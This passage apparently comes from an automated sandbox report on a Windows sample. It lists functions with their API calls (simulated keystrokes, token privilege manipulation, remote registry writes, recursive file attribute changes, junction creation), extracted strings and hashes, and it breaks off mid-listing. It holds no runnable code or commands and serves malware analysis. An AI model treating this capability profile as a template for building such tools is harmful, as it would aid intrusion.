String ID:
API String ID: 2514874351-0
Opcode ID: a3805d258effbfd0bccdde6508c89dc55aaf4771f8e2fe0b6835e6e72d6d3a26
Instruction ID: 696b7afc2a8c8153da2801a61d986ef44ddc2e2d8dcaf7ce4740beb8745695ae
Opcode Fuzzy Hash: a3805d258effbfd0bccdde6508c89dc55aaf4771f8e2fe0b6835e6e72d6d3a26
Instruction Fuzzy Hash: 7BE07D729001281BC720D25D9C05FEA77DDDF883A0F0441FAFC0CC3204D964AC8086D4

Function 0046525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00465266

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: b16d25808611e135ff03d44686e9ecc50f57b5fcb65ec7f00a91dcc17fce26ea
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 42B0927644020C77CE012A82EC02A493B199B41768F408061FB0C18162A677A6649A8A

Function 00B07784 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00B07799

Memory Dump Source

Source File: 00000000.00000002.1517936624.0000000000B05000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B05000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b05000_AxKxwW9WGa.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: b619571bdc1780cd8ae13a51392488be98d64da4ccd523ed45883e5933eab5b9
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 4BE0BF7498410DEFDB00DFA4D5496DD7BB4EF04301F1005A1FD05D7680DB309E548A62

Function 00B07788 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00B07799

Memory Dump Source

Source File: 00000000.00000002.1517936624.0000000000B05000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B05000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b05000_AxKxwW9WGa.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 3e27ffe5320f4c4102dd53a9387d660f26bae84d31621e7c40c992eb08ccfed3
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: BCE0E67498410DDFDB00DFB4D54969D7FF4EF04301F1001A1FD01D2280DA309D508A72

Non-executed Functions

Function 004CCABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00442612: GetWindowLongW.USER32(?,000000EB), ref: 00442623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 004CCB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 004CCB95
GetWindowLongW.USER32(?,000000F0), ref: 004CCBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004CCC00
SendMessageW.USER32 ref: 004CCC29
_wcsncpy.LIBCMT ref: 004CCC95
GetKeyState.USER32(00000011), ref: 004CCCB6
GetKeyState.USER32(00000009), ref: 004CCCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 004CCCD9
GetKeyState.USER32(00000010), ref: 004CCCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004CCD0C
SendMessageW.USER32 ref: 004CCD33
SendMessageW.USER32(?,00001030,?,004CB348), ref: 004CCE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 004CCE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 004CCE60
SetCapture.USER32(?), ref: 004CCE69
ClientToScreen.USER32(?,?), ref: 004CCECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 004CCEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004CCEF5
ReleaseCapture.USER32 ref: 004CCF00
GetCursorPos.USER32(?), ref: 004CCF3A
ScreenToClient.USER32(?,?), ref: 004CCF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 004CCFA3
SendMessageW.USER32 ref: 004CCFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 004CD00E
SendMessageW.USER32 ref: 004CD03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 004CD05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 004CD06D
GetCursorPos.USER32(?), ref: 004CD08D
ScreenToClient.USER32(?,?), ref: 004CD09A
GetParent.USER32(?), ref: 004CD0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 004CD123
SendMessageW.USER32 ref: 004CD154
ClientToScreen.USER32(?,?), ref: 004CD1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 004CD1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 004CD20C
SendMessageW.USER32 ref: 004CD22F
ClientToScreen.USER32(?,?), ref: 004CD281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 004CD2B5

Part of subcall function 004425DB: GetWindowLongW.USER32(?,000000EB), ref: 004425EC

GetWindowLongW.USER32(?,000000F0), ref: 004CD351

Strings

F, xrefs: 004CD235
pbP, xrefs: 004CCEAF
@GUI_DRAGID, xrefs: 004CCE9C

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F$pbP
API String ID: 3977979337-1761651261
Opcode ID: fc5a11877c00dca461f1c9b2d3b6baade8a736cd5c8b4a2c80cef7fa6d932ee0
Instruction ID: d5d3e4cbb13123633e285821206fa6b8518c576eaed1be0a1648d2481fd334c9
Opcode Fuzzy Hash: fc5a11877c00dca461f1c9b2d3b6baade8a736cd5c8b4a2c80cef7fa6d932ee0
Instruction Fuzzy Hash: 93429A38604240AFDB60CF64D884FABBBE5FF49310F14052EFA59872A1D739AC45DB5A

Function 00456F9E Relevance: 55.8, APIs: 19, Strings: 10, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004571C3
_memset.LIBCMT ref: 00457539
_memmove.LIBCMT ref: 004576AC

Strings

\b(?=\w), xrefs: 00493769
_E, xrefs: 004923CB
P\O, xrefs: 00491AB8
DEFINE, xrefs: 00492103
\b(?<=\w), xrefs: 00493773
]O, xrefs: 00491A22
[:>:]], xrefs: 00457492
3cE, xrefs: 004923A0
Q\E, xrefs: 00457FCB
[:<:]], xrefs: 00457479

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: _memmove$_memset
String ID: ]O$3cE$DEFINE$P\O$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_E
API String ID: 1357608183-210169746
Opcode ID: 6e3d83dc1962f2f9460cc78defb94874420d30a68b60225cca6cd929fb28e3d4
Instruction ID: e6ac3a3e22abcbbaebe3574609fda8c47f6655ed3c5ad9d83754ede5c953bc1b
Opcode Fuzzy Hash: 6e3d83dc1962f2f9460cc78defb94874420d30a68b60225cca6cd929fb28e3d4
Instruction Fuzzy Hash: 31939475A002159BDF24CF58D881BAEBBB1FF48310F25817BD945AB391E7789D82CB48

Function 004448D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 004448DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0047D665
IsIconic.USER32(?), ref: 0047D66E
ShowWindow.USER32(?,00000009), ref: 0047D67B
SetForegroundWindow.USER32(?), ref: 0047D685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0047D69B
GetCurrentThreadId.KERNEL32 ref: 0047D6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 0047D6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0047D6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 0047D6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 0047D6CF
SetForegroundWindow.USER32(?), ref: 0047D6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 0047D6E7
keybd_event.USER32(00000012,00000000), ref: 0047D6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 0047D6FC
keybd_event.USER32(00000012,00000000), ref: 0047D701
MapVirtualKeyW.USER32(00000012,00000000), ref: 0047D70A
keybd_event.USER32(00000012,00000000), ref: 0047D70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 0047D719
keybd_event.USER32(00000012,00000000), ref: 0047D71E
SetForegroundWindow.USER32(?), ref: 0047D721
AttachThreadInput.USER32(?,?,00000000), ref: 0047D748

Strings

Shell_TrayWnd, xrefs: 0047D660

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: d25d4cda991d30fb91cf4699d40ac3e86ba0844943fc3e5b6245469761cd3ad7
Instruction ID: 2b9134fc98ce7d015c574ed90befa8b2c89423abfddefe585840776f45c04b4b
Opcode Fuzzy Hash: d25d4cda991d30fb91cf4699d40ac3e86ba0844943fc3e5b6245469761cd3ad7
Instruction Fuzzy Hash: 24315371A40318BBEB206B619C49FBF7F6DEF44B50F104036FA05EA1D1C6B85D11AAA9

Function 00498310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 004987E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0049882B
Part of subcall function 004987E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00498858
Part of subcall function 004987E1: GetLastError.KERNEL32 ref: 00498865

_memset.LIBCMT ref: 00498353
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004983A5
CloseHandle.KERNEL32(?), ref: 004983B6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004983CD
GetProcessWindowStation.USER32 ref: 004983E6
SetProcessWindowStation.USER32(00000000), ref: 004983F0
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0049840A

Part of subcall function 004981CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00498309), ref: 004981E0
Part of subcall function 004981CB: CloseHandle.KERNEL32(?,?,00498309), ref: 004981F2

Strings

, xrefs: 00498362
default, xrefs: 00498405
winsta0, xrefs: 004983C8

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: a8cf766aa262cd4265c99fa1125f0ba5bbc5ff64ec8fc9ab9b104e586a9558d3
Instruction ID: ea5589b8a0ade1a8598aede4ab60cefbf57afd9a9a6d9380ba10a20918b98032
Opcode Fuzzy Hash: a8cf766aa262cd4265c99fa1125f0ba5bbc5ff64ec8fc9ab9b104e586a9558d3
Instruction Fuzzy Hash: DB816971900209BFDF119FA9CC45AEE7F79AF05318F14417EF910A2261EB399E19DB28

Function 004AC75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 004AC78D
FindClose.KERNEL32(00000000), ref: 004AC7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004AC806
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004AC81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 004AC844
__swprintf.LIBCMT ref: 004AC890
__swprintf.LIBCMT ref: 004AC8D3

Part of subcall function 00447DE1: _memmove.LIBCMT ref: 00447E22

__swprintf.LIBCMT ref: 004AC927

Part of subcall function 00463698: __woutput_l.LIBCMT ref: 004636F1

__swprintf.LIBCMT ref: 004AC975

Part of subcall function 00463698: __flsbuf.LIBCMT ref: 00463713
Part of subcall function 00463698: __flsbuf.LIBCMT ref: 0046372B

__swprintf.LIBCMT ref: 004AC9C4
__swprintf.LIBCMT ref: 004ACA13
__swprintf.LIBCMT ref: 004ACA62

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 004AC88A
%02d, xrefs: 004AC91B, 004AC925, 004AC973, 004AC9C2, 004ACA11, 004ACA60
%4d, xrefs: 004AC8CD

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: b462fe3455f8b580fa27e8d4477d85a4c6e8f0d8186cc1e575a54072f3ecb696
Instruction ID: 64d0bf46b6a041393595e96dfc8fc988659a48f54e912238b69cf5047b364039
Opcode Fuzzy Hash: b462fe3455f8b580fa27e8d4477d85a4c6e8f0d8186cc1e575a54072f3ecb696
Instruction Fuzzy Hash: 6EA13EB1408245ABD750EFA5C885DAFB7ECFF95708F40092EF585C6191EB38DA08CB66

Function 004AEF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 004AEFB6
_wcscmp.LIBCMT ref: 004AEFCB
_wcscmp.LIBCMT ref: 004AEFE2
GetFileAttributesW.KERNEL32(?), ref: 004AEFF4
SetFileAttributesW.KERNEL32(?,?), ref: 004AF00E
FindNextFileW.KERNEL32(00000000,?), ref: 004AF026
FindClose.KERNEL32(00000000), ref: 004AF031
FindFirstFileW.KERNEL32(*.*,?), ref: 004AF04D
_wcscmp.LIBCMT ref: 004AF074
_wcscmp.LIBCMT ref: 004AF08B
SetCurrentDirectoryW.KERNEL32(?), ref: 004AF09D
SetCurrentDirectoryW.KERNEL32(004F8920), ref: 004AF0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 004AF0C5
FindClose.KERNEL32(00000000), ref: 004AF0D2
FindClose.KERNEL32(00000000), ref: 004AF0E4

Strings

*.*, xrefs: 004AF048

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 7c96858f038df270e56be2dbd1c7f0012170bb132e8c0e13607aa51cc490a8d9
Instruction ID: 018c43186f762954aa9a3d49814fc4355ba622c099f817c9a2ed44a1538a7a32
Opcode Fuzzy Hash: 7c96858f038df270e56be2dbd1c7f0012170bb132e8c0e13607aa51cc490a8d9
Instruction Fuzzy Hash: 9E31C1325052187ACB149FE4DC48EEEB7AD9F5A360F1041B7E800D31A1EB79DA48CA6D

Function 004C0857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004C0953
RegCreateKeyExW.ADVAPI32(?,?,00000000,004CF910,00000000,?,00000000,?,?), ref: 004C09C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 004C0A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 004C0A92
RegCloseKey.ADVAPI32(?), ref: 004C0DB2
RegCloseKey.ADVAPI32(00000000), ref: 004C0DBF

Strings

REG_BINARY, xrefs: 004C0D4D
REG_MULTI_SZ, xrefs: 004C0B7A
REG_SZ, xrefs: 004C0AD0
REG_QWORD, xrefs: 004C0D00
REG_EXPAND_SZ, xrefs: 004C0A2F
REG_DWORD, xrefs: 004C0C83

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: f5fd7cd28c7269b43e27e5a5473a614c1fe346565c726b546669e1b2bb99cfc8
Instruction ID: 5d8eb41ca2caba506d324b6e550b0d4a8f567d2d37b7e42c33b7ec61233c8c11
Opcode Fuzzy Hash: f5fd7cd28c7269b43e27e5a5473a614c1fe346565c726b546669e1b2bb99cfc8
Instruction Fuzzy Hash: 0A025A796006019FDB54EF19C841E2AB7E5FF89714F04846EF84A9B362DB39EC05CB89

Function 004566E1 Relevance: 25.9, Strings: 20, Instructions: 889COMMON

Download Yara Rule

Strings

ANYCRLF), xrefs: 004912FB
NO_AUTO_POSSESS), xrefs: 0049112E
BSR_ANYCRLF), xrefs: 0049131E
CR), xrefs: 00491287
LF), xrefs: 004912A4
LIMIT_MATCH=, xrefs: 00491170
0DN, xrefs: 00456733
BSR_UNICODE), xrefs: 00491338
_E, xrefs: 00491465, 0049150C, 004915B4
pGN, xrefs: 00456751
NO_START_OPT), xrefs: 0049114F
UCP), xrefs: 0049110D
0EN, xrefs: 0045673D
CRLF), xrefs: 004912C1
UTF), xrefs: 004910FA
ANY), xrefs: 004912DE
UTF16), xrefs: 004910CF
3cE, xrefs: 004568FF
0FN, xrefs: 00456747
LIMIT_RECURSION=, xrefs: 004911FC

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID:
String ID: 0DN$0EN$0FN$3cE$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGN$_E
API String ID: 0-1144574888
Opcode ID: b4e4760831f1e86355994a26b7006630201f0b8ae72fe1d8a3224d7d17d89cfb
Instruction ID: 495b69c4c7bb4779e3e7dab66a42ef3f71f47ab931160539c492db45ca17390e
Opcode Fuzzy Hash: b4e4760831f1e86355994a26b7006630201f0b8ae72fe1d8a3224d7d17d89cfb
Instruction Fuzzy Hash: 5F727F75E0021A9BDF24CF59C8807AEBBB5FF48310F55816BE805EB291DB389D45CB98

Function 004AF0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 004AF113
_wcscmp.LIBCMT ref: 004AF128
_wcscmp.LIBCMT ref: 004AF13F

Part of subcall function 004A4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004A43A0

FindNextFileW.KERNEL32(00000000,?), ref: 004AF16E
FindClose.KERNEL32(00000000), ref: 004AF179
FindFirstFileW.KERNEL32(*.*,?), ref: 004AF195
_wcscmp.LIBCMT ref: 004AF1BC
_wcscmp.LIBCMT ref: 004AF1D3
SetCurrentDirectoryW.KERNEL32(?), ref: 004AF1E5
SetCurrentDirectoryW.KERNEL32(004F8920), ref: 004AF203
FindNextFileW.KERNEL32(00000000,00000010), ref: 004AF20D
FindClose.KERNEL32(00000000), ref: 004AF21A
FindClose.KERNEL32(00000000), ref: 004AF22C

Strings

*.*, xrefs: 004AF190

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 82b2a5537199fa77060c3c3798b36a66b9d9988312260f9ce22705e871b29951
Instruction ID: 0e73652797d9d0f3563721b74da0687bb3fa3a09986f887320d5a2d4ca1c3ce4
Opcode Fuzzy Hash: 82b2a5537199fa77060c3c3798b36a66b9d9988312260f9ce22705e871b29951
Instruction Fuzzy Hash: 4D31D3365002197ADB109EE0EC48FEF77AD9F56360F1001B7E800A31A0EB39DE49CA5C

Function 004AA1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 004AA20F
__swprintf.LIBCMT ref: 004AA231
CreateDirectoryW.KERNEL32(?,00000000), ref: 004AA26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 004AA293
_memset.LIBCMT ref: 004AA2B2
_wcsncpy.LIBCMT ref: 004AA2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 004AA323
CloseHandle.KERNEL32(00000000), ref: 004AA32E
RemoveDirectoryW.KERNEL32(?), ref: 004AA337
CloseHandle.KERNEL32(00000000), ref: 004AA341

Strings

\, xrefs: 004AA247
\??\%s, xrefs: 004AA22B
:, xrefs: 004AA252

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: e0fd7cf4d552b10742618e1495970d6c76eff92cbd6d1cf943e6c54714b562d0
Instruction ID: 7cc04d533b8291a5d1ba982b0bae5750e08c2935563604ece7b024aa7f713e50
Opcode Fuzzy Hash: e0fd7cf4d552b10742618e1495970d6c76eff92cbd6d1cf943e6c54714b562d0
Instruction Fuzzy Hash: 4E31B3B1500109ABDB219FA1DC45FEB37BDEF89745F1040B6F908D6160EB789654CB29

Function 004A001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 004A0097
SetKeyboardState.USER32(?), ref: 004A0102
GetAsyncKeyState.USER32(000000A0), ref: 004A0122
GetKeyState.USER32(000000A0), ref: 004A0139
